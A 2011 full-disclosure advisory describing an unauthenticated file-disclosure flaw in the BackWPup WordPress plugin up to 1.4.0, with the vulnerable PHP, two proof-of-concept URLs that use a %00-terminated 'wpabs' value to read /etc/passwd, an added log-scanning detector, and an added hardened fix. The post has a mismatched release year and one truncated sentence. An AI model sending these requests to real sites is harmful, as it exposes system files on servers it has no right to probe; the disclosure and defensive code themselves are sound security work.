
List:       full-disclosure
Subject:    [Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content
From:       Danilo Massa <danilo_m () yahoo ! com>
Date:       2011-02-28 15:41:19
Message-ID: 913509.37937.qm () web114218 ! mail ! gq1 ! yahoo ! com

=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for WordPress.
The plugin provides:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
 
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and possibly earlier versions too) has an unfiltered
parameter in two PHP pages that lets a remote user access sensitive files such as
/etc/passwd. No authentication is required, and the plugin does not need to be
activated.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the PHP pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.

Both files start by trying to include wp-load.php using the wpabs parameter,
which can be injected by calling the page directly.

options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) 
{
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) {
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...

Inserting a string terminator (%00) into the wpabs parameter makes it possible to
specify a file name instead of a directory, and that file is then included in the
web page.
NOTE: also the 

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts
WordPress with the vulnerable plugin.

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd

Both of them will display the /etc/passwd file.
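A detection check, added here and not part of the advisory: it scans web server access log lines for requests to the two pages above whose wpabs value differs from the site's own WordPress root. It assumes that the plugin's own iframes send that root path (ABSPATH) in wpabs, so any other value, above all one carrying a %00 terminator, deserves an alert; the expected path, the function names and the log lines are constructed for the example.

```php
<?php
// Added example, not part of the advisory: flag access-log requests to the two
// BackWPup pages whose "wpabs" value is not the site's WordPress root (ABSPATH).
// Assumption: the plugin's own iframes send ABSPATH, so any other value, above
// all one carrying a %00 terminator, is worth an alert.

const BACKWPUP_PAGES = '#/plugins/backwpup/app/options-(?:runnow|view_log)-iframe\.php#';
/** Return the reasons one request target is suspicious, or [] if it is not. */
function backwpup_wpabs_findings(string $target, string $expectedAbspath): array
{
    if (!preg_match(BACKWPUP_PAGES, $target)) {
        return [];
    }
    $query = (string) parse_url($target, PHP_URL_QUERY);
    // Read the raw value: parse_str() would decode %00 into a real NUL byte.
    if (!preg_match('/(?:^|&)wpabs=([^&]*)/', $query, $m)) {
        return [];
    }
    $findings = [];
    if (stripos($m[1], '%00') !== false) {
        $findings[] = 'NUL byte in wpabs (include-path truncation attempt)';
    }
    if (rawurldecode($m[1]) !== $expectedAbspath) {
        $findings[] = 'wpabs is not the expected ABSPATH';
    }
    return $findings;
}

/** Scan Apache combined-format lines; returns [line number => findings]. */
function backwpup_scan_log(array $lines, string $expectedAbspath): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            $f = backwpup_wpabs_findings($m[1], $expectedAbspath);
            if ($f !== []) {
                $hits[$i + 1] = $f;
            }
        }
    }
    return $hits;
}

// Constructed sample lines: the advisory's test request and a benign plugin hit.
$sample = [
    '203.0.113.5 - - [28/Feb/2011:15:41:19 +0000] "GET /wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1 HTTP/1.1" 200 2311 "-" "curl/7.21"',
    '198.51.100.7 - - [28/Feb/2011:15:42:03 +0000] "GET /wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/var/www/html/&jobid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];
print_r(backwpup_scan_log($sample, '/var/www/html/'));
```

Only the first sample line is reported, with both findings; the second carries the expected root and stays silent.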

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
readable by the web application server user.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.

VIII. SOLUTION
-------------------------
Upgrade to a patched release or, as a quick workaround, wrap every
$_GET['wpabs'] in a trim() call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) {
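A hardened form of the include, added here as an illustration and not the plugin's own or the vendor's 1.4.1 code: the path of wp-load.php is computed from the script's own location, so no request parameter can steer it. It assumes the file layout named in this advisory (wp-content/plugins/backwpup/app/) and PHP 7.1 or later; the helper names are made up for the example.

```php
<?php
// Added example, not the plugin's or vendor's code: load wp-load.php from a
// path computed from this script's own location, so no request parameter can
// steer the include. Assumed layout: this file lives in
// wp-content/plugins/backwpup/app/, four directories below the WordPress root.
// Note that the trim() workaround above only strips NUL bytes at the ends of
// the string; the robust fix is to stop reading the path from $_GET at all.

/**
 * Absolute path of the WordPress root's wp-load.php, or null when the file is
 * not where the plugin layout says it must be (e.g. a moved or broken install).
 */
function backwpup_wp_load_path(): ?string
{
    $root = realpath(__DIR__ . '/../../../..');
    if ($root === false) {
        return null;
    }
    $candidate = $root . DIRECTORY_SEPARATOR . 'wp-load.php';
    return is_file($candidate) ? $candidate : null;
}

/**
 * The job id is the only request input this page needs: accept a bare
 * decimal integer and nothing else (is_numeric() would also admit "1e3").
 */
function backwpup_job_id(?string $raw): ?int
{
    return ($raw !== null && preg_match('/^\d{1,9}$/', $raw)) ? (int) $raw : null;
}

$wpLoad = backwpup_wp_load_path();
$jobId  = backwpup_job_id($_GET['jobid'] ?? null);
if ($wpLoad === null || $jobId === null) {
    http_response_code(400);
    exit('BackWPup: invalid request');
}
require_once $wpLoad;  // Setup WordPress environment from the fixed path
// $_GET['wpabs'] is deliberately never read; the remaining page logic would
// also need a capability check (current_user_can) before running job $jobId.
```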

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor releases an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this  
information.
